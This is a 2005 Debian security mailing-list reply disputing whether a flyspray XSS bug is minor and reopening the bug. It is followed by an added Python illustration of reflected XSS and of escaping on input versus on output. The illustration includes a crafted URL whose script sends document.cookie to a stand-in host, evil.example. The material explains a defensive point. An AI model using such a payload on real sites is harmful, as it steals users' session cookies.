[Secure-testing-team] Re: Bug#335997: flyspray: Multiple XSS vulnerabilities

Thijs Kinkhorst kink at squirrelmail.org
Sat Dec 31 15:27:47 UTC 2005


reopen 335997
found 335997 0.9.7-2
thanks

Hello Pierre,

Sorry, didn't have time to get back to this earlier. I've verified that
unstable is indeed completely fixed for CVE-2005-3334 (which contains
some typos in the names of the affected variables).

> Though, please note that this XSS vulnerability IS really minor: it 
> has to be created from a user that stole your PHPSESSID, and made a 
> treacherous search, and forced the user to use 'last search result' 
> *BEFORE* you do a new search yourself, which is *REALLY* unlikely. That 
> is not doable for anonymous users.

I don't subscribe to this assessment. This is a classic XSS, which can
be exploited as any other: trick the user into going to a specially
crafted URL and you can access his password cookie through JavaScript.
You don't need to steal anything or bring the system into a specific
state.

> I'll try to have a minimalist patch ASAP, but the stable version is not 
> really based on the same code (I mean the version in unstable is quite 
> bigger) and I'm not sure a patch is that simple to transpose (you must 
> have seen that my patch was quite brutal: I escaped any POST-ed or 
> GET-ed variable, which is most of the time OK, but which is not really 
> nice nor "the right way", since it results in some entities showing up 
> in mails).

At least I can confirm that the stable version is still vulnerable to
this attack; it's easily reproducible. If you want I can look into
providing a patch or an updated package. In any case, the bug should not
yet be closed.


bye,
Thijs
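The two points argued in this thread, that a reflected XSS needs nothing more than a crafted URL, and that escaping every GET/POST value on arrival leaks HTML entities into plain-text mail, can be shown side by side. The following is an added illustration, not code from flyspray or from either poster; the tracker URL, the `search` parameter, the page and mail templates and the `evil.example` host are all constructed for the example.

```python
import html
from urllib.parse import parse_qs, urlparse

# Constructed example URL (not taken from the bug report): the search term
# carries a script that sends the victim's cookies to an attacker-controlled host.
CRAFTED_URL = (
    "http://tracker.example/index.php?search="
    "%3Cscript%3Enew%20Image%28%29.src%3D%22http%3A%2F%2Fevil.example%2Fc%3F%22"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)


def search_term(url: str) -> str:
    """Return the 'search' query parameter as the server would decode it."""
    return parse_qs(urlparse(url).query).get("search", [""])[0]


def html_page(term: str) -> str:
    """Results page: the term is interpolated into an HTML context."""
    return f"<p>Results for '{term}'</p>"


def notify_mail(term: str) -> str:
    """Plain-text notification mail: the term is interpolated as text."""
    return f"Subject: saved search\n\nYour saved search is: {term}\n"


def handle_vulnerable(url: str) -> tuple[str, str]:
    """No escaping at all: the crafted term lands verbatim in the page."""
    term = search_term(url)
    return html_page(term), notify_mail(term)


def handle_escape_on_input(url: str) -> tuple[str, str]:
    """Escape every incoming value once (the 'brutal' approach from the thread).

    The page is safe, but the same escaped string is reused for the mail,
    so the recipient sees &lt; and &quot; instead of the characters typed.
    """
    term = html.escape(search_term(url))
    return html_page(term), notify_mail(term)


def handle_escape_on_output(url: str) -> tuple[str, str]:
    """Keep the raw value and escape at each output for that output's context.

    HTML gets html.escape(); the plain-text mail gets the text unchanged.
    """
    term = search_term(url)
    return html_page(html.escape(term)), notify_mail(term)


def has_script_tag(s: str) -> bool:
    """Crude check: does a <script element appear in the rendered output?"""
    return "<script" in s.lower()


def has_html_entities(s: str) -> bool:
    """Detect HTML entities leaking into a context that is not HTML."""
    return any(e in s for e in ("&lt;", "&gt;", "&quot;", "&#x27;", "&amp;"))


if __name__ == "__main__":
    for name, handler in (("vulnerable", handle_vulnerable),
                          ("escape on input", handle_escape_on_input),
                          ("escape on output", handle_escape_on_output)):
        page, mail = handler(CRAFTED_URL)
        print(f"{name:17s} script in page: {has_script_tag(page)!s:5s} "
              f"entities in mail: {has_html_entities(mail)}")
```

The victim only has to follow `CRAFTED_URL`; no session theft or prior state is needed, which is the point made above. Escaping at input does close the hole, but the mail output shows why it is not "the right way": the correct escaping function depends on where the value is written (HTML body, attribute, URL, plain text), so it belongs at each output site, with the stored value kept raw.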